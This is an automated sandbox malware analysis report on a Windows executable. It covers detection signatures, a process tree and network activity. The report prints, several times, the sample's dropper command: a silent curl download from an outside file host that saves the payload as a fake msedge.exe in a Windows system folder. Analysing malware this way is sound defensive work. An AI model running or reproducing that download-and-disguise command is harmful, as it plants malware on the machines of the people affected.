Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
4sTTCruY06.exe

Overview

General Information

Sample name:4sTTCruY06.exe
renamed because original name is a hash value
Original sample name:38c2636423b5916077207678dd1adbc782d863342e75fdcaabad162d8f8e2824.exe
Analysis ID:1522833
MD5:5a4bbfbb9e1269cbc36a6371d77acbfc
SHA1:807a3b64b0ce44a80e3c7e347b5a02372e28892e
SHA256:38c2636423b5916077207678dd1adbc782d863342e75fdcaabad162d8f8e2824
Tags:exezelensky-topuser-JAMESWT_MHT
Infos:

Detection

HTMLPhisher
Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected BlockedWebSite
AI detected suspicious sample
Creates HTML files with .exe extension (expired dropper behavior)
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 4sTTCruY06.exe (PID: 3348 cmdline: "C:\Users\user\Desktop\4sTTCruY06.exe" MD5: 5A4BBFBB9E1269CBC36A6371D77ACBFC)
    • conhost.exe (PID: 3576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3812 cmdline: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin --output C:\Windows\Speech\msedge.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • curl.exe (PID: 4524 cmdline: curl --silent https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin --output C:\Windows\Speech\msedge.exe MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Windows\Speech\msedge.exeJoeSecurity_BlockedWebSiteYara detected BlockedWebSiteJoe Security
    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin --output C:\Windows\Speech\msedge.exe, CommandLine: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin --output C:\Windows\Speech\msedge.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\4sTTCruY06.exe", ParentImage: C:\Users\user\Desktop\4sTTCruY06.exe, ParentProcessId: 3348, ParentProcessName: 4sTTCruY06.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin --output C:\Windows\Speech\msedge.exe, ProcessId: 3812, ProcessName: cmd.exe
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: 4sTTCruY06.exeReversingLabs: Detection: 21%
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.4% probability

    Phishing

    barindex
    Source: Yara matchFile source: C:\Windows\Speech\msedge.exe, type: DROPPED
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49706 version: TLS 1.2
    Source: 4sTTCruY06.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

    Networking

    barindex
    Source: C:\Windows\System32\curl.exeFile created: msedge.exe.3.dr
    Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
    Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
    Source: Joe Sandbox ViewJA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /ZloBYxFY2AfQRNoi/dx3d9.bin HTTP/1.1Host: file.gardenUser-Agent: curl/7.83.1Accept: */*
    Source: global trafficDNS traffic detected: DNS query: file.garden
    Source: Amcache.hve.0.drString found in binary or memory: http://upx.sf.net
    Source: curl.exe, 00000003.00000002.2090175602.0000022B46EA0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000002.2090175602.0000022B46EA8000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.2090061719.0000022B46EB6000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.2089991956.0000022B46EB3000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000002.2090225439.0000022B46EDA000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.2090042256.0000022B46EDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin
    Source: curl.exe, 00000003.00000002.2090175602.0000022B46EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin--outputC:
    Source: curl.exe, 00000003.00000002.2090175602.0000022B46EA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.binlrc
    Source: curl.exe, 00000003.00000003.2089781752.0000022B46F05000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.2089724979.0000022B46F1E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.2089833939.0000022B46F1E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.2089781752.0000022B46F1E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.2089881481.0000022B46EC0000.00000004.00000020.00020000.00000000.sdmp, msedge.exe.3.drString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
    Source: curl.exe, 00000003.00000003.2089724979.0000022B46F1E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.2089833939.0000022B46F1E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.2089781752.0000022B46F1E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.2089881481.0000022B46EC0000.00000004.00000020.00020000.00000000.sdmp, msedge.exe.3.drString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49706 version: TLS 1.2
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DCF96E0 free,OpenClipboard,GetClipboardData,CloseClipboard,GlobalLock,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,CloseClipboard,0_2_00007FF69DCF96E0
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DCF9840 OpenClipboard,MultiByteToWideChar,GlobalAlloc,GlobalLock,MultiByteToWideChar,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,CloseClipboard,0_2_00007FF69DCF9840
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DCF96E0 free,OpenClipboard,GetClipboardData,CloseClipboard,GlobalLock,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,CloseClipboard,0_2_00007FF69DCF96E0
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DCDEAF4 TranslateMessage,DispatchMessageW,PeekMessageW,GetCursorPos,GetAsyncKeyState,0_2_00007FF69DCDEAF4
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DCE1090 GetClientRect,QueryPerformanceCounter,GetForegroundWindow,ClientToScreen,SetCursorPos,GetCursorPos,ScreenToClient,GetKeyState,GetKeyState,GetKeyState,GetKeyState,0_2_00007FF69DCE1090
    Source: C:\Windows\System32\curl.exeFile created: C:\Windows\Speech\msedge.exeJump to behavior
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DCD12300_2_00007FF69DCD1230
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DCEC3260_2_00007FF69DCEC326
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DCE53200_2_00007FF69DCE5320
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DD0CAA00_2_00007FF69DD0CAA0
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DCF5A800_2_00007FF69DCF5A80
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DD016800_2_00007FF69DD01680
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DCFCEA00_2_00007FF69DCFCEA0
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DD0E2600_2_00007FF69DD0E260
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DD0F2600_2_00007FF69DD0F260
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DCFF6400_2_00007FF69DCFF640
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DCDF6400_2_00007FF69DCDF640
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DD106500_2_00007FF69DD10650
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DCE6E120_2_00007FF69DCE6E12
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DCD8E100_2_00007FF69DCD8E10
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DCE0A0C0_2_00007FF69DCE0A0C
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DCE0A300_2_00007FF69DCE0A30
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DCE95D00_2_00007FF69DCE95D0
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DCF11F00_2_00007FF69DCF11F0
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DCE69900_2_00007FF69DCE6990
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DCDB15E0_2_00007FF69DCDB15E
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DCE5D100_2_00007FF69DCE5D10
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DCF75300_2_00007FF69DCF7530
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DD011300_2_00007FF69DD01130
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DCE74C00_2_00007FF69DCE74C0
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DCF6CE00_2_00007FF69DCF6CE0
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DCEFC900_2_00007FF69DCEFC90
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DD008900_2_00007FF69DD00890
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DCE10900_2_00007FF69DCE1090
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DCFFC800_2_00007FF69DCFFC80
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DD0BCB00_2_00007FF69DD0BCB0
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DCE00B00_2_00007FF69DCE00B0
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DCFB8A00_2_00007FF69DCFB8A0
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DCD70500_2_00007FF69DCD7050
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DCDF4500_2_00007FF69DCDF450
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DD17C700_2_00007FF69DD17C70
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DD170400_2_00007FF69DD17040
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DCE5C600_2_00007FF69DCE5C60
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DD0DC500_2_00007FF69DD0DC50
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DD070000_2_00007FF69DD07000
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DCD402D0_2_00007FF69DCD402D
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DCD40290_2_00007FF69DCD4029
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DCD40250_2_00007FF69DCD4025
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DCF50200_2_00007FF69DCF5020
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DD02C200_2_00007FF69DD02C20
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DCD40210_2_00007FF69DCD4021
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DCD98200_2_00007FF69DCD9820
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DCD401D0_2_00007FF69DCD401D
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DCD40190_2_00007FF69DCD4019
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DCD5BD00_2_00007FF69DCD5BD0
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DCE77F50_2_00007FF69DCE77F5
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DCF3BE00_2_00007FF69DCF3BE0
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DCEA7E00_2_00007FF69DCEA7E0
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DD013E00_2_00007FF69DD013E0
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DCD5FE00_2_00007FF69DCD5FE0
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DCFDF800_2_00007FF69DCFDF80
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DD093B00_2_00007FF69DD093B0
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DD003400_2_00007FF69DD00340
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DCD3B700_2_00007FF69DCD3B70
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: String function: 00007FF69DCF99F0 appears 34 times
    Source: classification engineClassification label: mal64.phis.winEXE@7/3@1/2
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DCD1230 CreateThread,GetSystemMetrics,GetSystemMetrics,CreateFileA,CreateToolhelp32Snapshot,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@I@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z,GetModuleHandleA,GetCurrentProcessId,FreeLibrary,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_J@Z,_beginthreadex,_Thrd_detach,_beginthreadex,_Thrd_detach,_beginthreadex,_Thrd_detach,?_Throw_Cpp_error@std@@YAXH@Z,?_Throw_Cpp_error@std@@YAXH@Z,?_Throw_Cpp_error@std@@YAXH@Z,?_Throw_Cpp_error@std@@YAXH@Z,?_Throw_Cpp_error@std@@YAXH@Z,?_Throw_Cpp_error@std@@YAXH@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,0_2_00007FF69DCD1230
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3576:120:WilError_03
    Source: 4sTTCruY06.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\4sTTCruY06.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\4sTTCruY06.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: 4sTTCruY06.exeReversingLabs: Detection: 21%
    Source: unknownProcess created: C:\Users\user\Desktop\4sTTCruY06.exe "C:\Users\user\Desktop\4sTTCruY06.exe"
    Source: C:\Users\user\Desktop\4sTTCruY06.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\4sTTCruY06.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin --output C:\Windows\Speech\msedge.exe
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin --output C:\Windows\Speech\msedge.exe
    Source: C:\Users\user\Desktop\4sTTCruY06.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin --output C:\Windows\Speech\msedge.exeJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin --output C:\Windows\Speech\msedge.exeJump to behavior
    Source: C:\Users\user\Desktop\4sTTCruY06.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\4sTTCruY06.exeSection loaded: d3d11.dllJump to behavior
    Source: C:\Users\user\Desktop\4sTTCruY06.exeSection loaded: msvcp140.dllJump to behavior
    Source: C:\Users\user\Desktop\4sTTCruY06.exeSection loaded: d3dcompiler_47.dllJump to behavior
    Source: C:\Users\user\Desktop\4sTTCruY06.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Users\user\Desktop\4sTTCruY06.exeSection loaded: vcruntime140_1.dllJump to behavior
    Source: C:\Users\user\Desktop\4sTTCruY06.exeSection loaded: vcruntime140.dllJump to behavior
    Source: C:\Users\user\Desktop\4sTTCruY06.exeSection loaded: dxgi.dllJump to behavior
    Source: C:\Users\user\Desktop\4sTTCruY06.exeSection loaded: vcruntime140.dllJump to behavior
    Source: C:\Users\user\Desktop\4sTTCruY06.exeSection loaded: vcruntime140_1.dllJump to behavior
    Source: C:\Users\user\Desktop\4sTTCruY06.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\4sTTCruY06.exeSection loaded: vcruntime140.dllJump to behavior
    Source: C:\Users\user\Desktop\4sTTCruY06.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\4sTTCruY06.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\Desktop\4sTTCruY06.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\4sTTCruY06.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Users\user\Desktop\4sTTCruY06.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\user\Desktop\4sTTCruY06.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Desktop\4sTTCruY06.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\Desktop\4sTTCruY06.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\4sTTCruY06.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\4sTTCruY06.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\4sTTCruY06.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\4sTTCruY06.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\4sTTCruY06.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\Desktop\4sTTCruY06.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\4sTTCruY06.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Users\user\Desktop\4sTTCruY06.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\Desktop\4sTTCruY06.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\Desktop\4sTTCruY06.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\Desktop\4sTTCruY06.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\Desktop\4sTTCruY06.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Users\user\Desktop\4sTTCruY06.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\4sTTCruY06.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Users\user\Desktop\4sTTCruY06.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Users\user\Desktop\4sTTCruY06.exeSection loaded: slc.dllJump to behavior
    Source: C:\Users\user\Desktop\4sTTCruY06.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\4sTTCruY06.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Users\user\Desktop\4sTTCruY06.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Users\user\Desktop\4sTTCruY06.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\curl.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\System32\curl.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Windows\System32\curl.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Windows\System32\curl.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\System32\curl.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\System32\curl.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\Desktop\4sTTCruY06.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
    Source: 4sTTCruY06.exeStatic PE information: Image base 0x140000000 > 0x60000000
    Source: 4sTTCruY06.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
    Source: 4sTTCruY06.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
    Source: 4sTTCruY06.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
    Source: 4sTTCruY06.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: 4sTTCruY06.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
    Source: 4sTTCruY06.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
    Source: 4sTTCruY06.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Source: 4sTTCruY06.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: 4sTTCruY06.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
    Source: 4sTTCruY06.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
    Source: 4sTTCruY06.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
    Source: 4sTTCruY06.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
    Source: 4sTTCruY06.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DCE0710 QueryPerformanceFrequency,QueryPerformanceCounter,malloc,LoadLibraryA,GetProcAddress,GetProcAddress,0_2_00007FF69DCE0710
    Source: 4sTTCruY06.exeStatic PE information: section name: _RDATA
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DCDA2D3 push rsp; retf 0_2_00007FF69DCDA2D4
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DCDA264 push rsp; retf 0_2_00007FF69DCDA26A
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DD14D83 push rbp; retf 0_2_00007FF69DD14D88
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DCDAF86 push rdx; retf 0004h0_2_00007FF69DCDAF87
    Source: C:\Users\user\Desktop\4sTTCruY06.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\4sTTCruY06.exeCode function: 0_2_00007FF69DCD1230 CreateThread,GetSystemMetrics,GetSystemMetrics,CreateFileA,CreateToolhelp32Snapshot,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@I@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z,GetModuleHandleA,GetCurrentProcessId,FreeLibrary,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_J@Z,_beginthreadex,_Thrd_detach,_beginthreadex,_Thrd_detach,_beginthreadex,_Thrd_detach,?_Throw_Cpp_error@std@@YAXH@Z,?_Throw_Cpp_error@std@@YAXH@Z,?_Throw_Cpp_error@std@@YAXH@Z,?_Throw_Cpp_error@std@@YAXH@Z,?_Throw_Cpp_error@std@@YAXH@Z,?_Throw_Cpp_error@std@@YAXH@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,0_2_00007FF69DCD1230
    Source: C:\Users\user\Desktop\4sTTCruY06.exeAPI coverage: 2.1 %
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: Amcache.hve.0.drBinary or memory string: VMware
    Source: Amcache.hve.0.drBinary or memory string: VMware Virtual USB Mouse
    Source: Amcache.hve.0.drBinary or memory string: vmci.syshbin
    Source: Amcache.hve.0.drBinary or memory string: VMware, Inc.
    Source: Amcache.hve.0.drBinary or memory string: VMware20,1hbin@
    Source: Amcache.hve.0.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
    Source: Amcache.hve.0.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.0.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
    Source: Amcache.hve.0.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: curl.exe, 00000003.00000003.2089991956.0000022B46EB3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll'
    Source: Amcache.hve.0.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
    Source: Amcache.hve.0.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
